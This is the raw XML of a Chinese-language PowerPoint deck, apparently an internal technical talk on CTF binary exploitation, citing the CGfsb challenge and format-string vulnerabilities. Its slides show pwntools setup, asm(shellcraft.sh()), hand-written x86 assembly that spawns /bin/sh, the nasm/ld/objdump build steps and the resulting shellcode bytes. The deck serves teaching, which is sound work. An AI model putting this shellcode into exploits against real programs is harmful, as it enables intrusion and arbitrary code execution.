            <a:ext cx="720090" cy="588767"/>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10571797" y="5533275"/>
            <a:ext cx="1620202" cy="1324725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" r:link="rId13" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5533275"/>
            <a:ext cx="1620202" cy="132472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588767"/>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1397000"/>
            <a:ext cx="3612445" cy="4064000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" r:link="rId13" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8579555" y="1397000"/>
            <a:ext cx="3612445" cy="4064000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>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7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3376614" y="3052128"/>
            <a:ext cx="5438775" cy="714375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="4572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8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3376614" y="3883343"/>
            <a:ext cx="5438775" cy="1237297"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="4572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email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="720090" cy="588767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14" r:link="rId15"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8" name="页脚占位符 7"/>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304800" y="2194560"/>
            <a:ext cx="4389120" cy="2468880"/>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6269233"/>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588767"/>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588767"/>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2021/4/27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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588767"/>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588767"/>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2021/4/27</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95.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image" Target="../media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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6.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comments" Target="../comments/comment5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag201.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image" Target="../media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag203.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20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notesSlide" Target="../notesSlides/notesSlide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209.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag208.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/0_pic_quater_right_down.png"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150.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image" Target="../media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag152.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5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3.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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag158.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag157.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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag164.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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag163.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><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3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag166.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.jpeg"/><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5.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag170.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag169.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag168.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172.xml"/><Relationship Id="rId1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tags" Target="../tags/tag171.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/0_pic_quater_right_down.png" TargetMode="Externa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16.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag175.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3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag177.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment3.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76.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><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3.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media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag183.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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comments" Target="../comments/comment4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag191.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0.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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术分享</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>创新业务部 项目技术组</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>赵桐</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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" spc="5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栗子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501775" y="3858895"/>
            <a:ext cx="9188450" cy="2080895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pP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攻防世界：CGfsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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,string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" r:link="rId10" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10571797" y="5533275"/>
            <a:ext cx="1620202" cy="1324725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" r:link="rId12" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5533275"/>
            <a:ext cx="1620202" cy="132472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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649995" y="1880529"/>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1345" y="1162050"/>
            <a:ext cx="12337415" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当我们在获得程序的漏洞后，就可以在程序的漏洞处执行特定的代码，而这些代码也就是俗称的shellcode。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541655" y="1860550"/>
            <a:ext cx="2540000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.From pwntools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541655" y="2687955"/>
            <a:ext cx="6252845" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>context(os=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>arch=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>log_level=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608330" y="3396615"/>
            <a:ext cx="5918200" cy="1529715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1. os设置系统为linux系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2. arch设置架构为amd64，对应的32位模式是’i386’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3. log_level设置日志输出的等级为debug，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会将完整的io过程都打印下来，使得调试更加方便</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608330" y="5085715"/>
            <a:ext cx="5715635" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获得执行system(“/bin/sh”)汇编代码所对应的机器码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>asm(shellcraft.sh()) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049770" y="1946275"/>
            <a:ext cx="2540000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.by self</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7129145" y="2592705"/>
            <a:ext cx="2540000" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>global _start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>_start:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>xor eax,eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>xor edx,edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>push edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>push "//sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>push "/bin"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>mov ebx,esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>xor ecx,ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>mov al,0Bh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>int 80h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8879840" y="3056255"/>
            <a:ext cx="3255010" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>使用汇编写一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>文件，最后写一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>int 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>软中断</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>然后nasm -f elf32 文件名.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>ld -m elf_i386 -o 文件名 文件名.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>objdump -o 文件名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>最后得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="肘形连接符 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="0"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="9221470" y="1770380"/>
            <a:ext cx="463550" cy="2108200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15137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07380" y="5940425"/>
            <a:ext cx="6344285" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>shellcode="\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="直接箭头连接符 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="25" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8879840" y="4624705"/>
            <a:ext cx="1627505" cy="131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97500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" spc="300">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>谢谢观看</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" r:link="rId9" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10571797" y="5533275"/>
            <a:ext cx="1620202" cy="1324725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" r:link="rId11" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5533275"/>
            <a:ext cx="1620202" cy="132472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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840865" y="2720340"/>
            <a:ext cx="8510905" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"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7200" b="1" spc="200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>格式化字符串漏洞</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2"/>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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501775" y="2622550"/>
            <a:ext cx="9188450" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:normAutofit fontScale="97500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" spc="300">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>很久以前</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
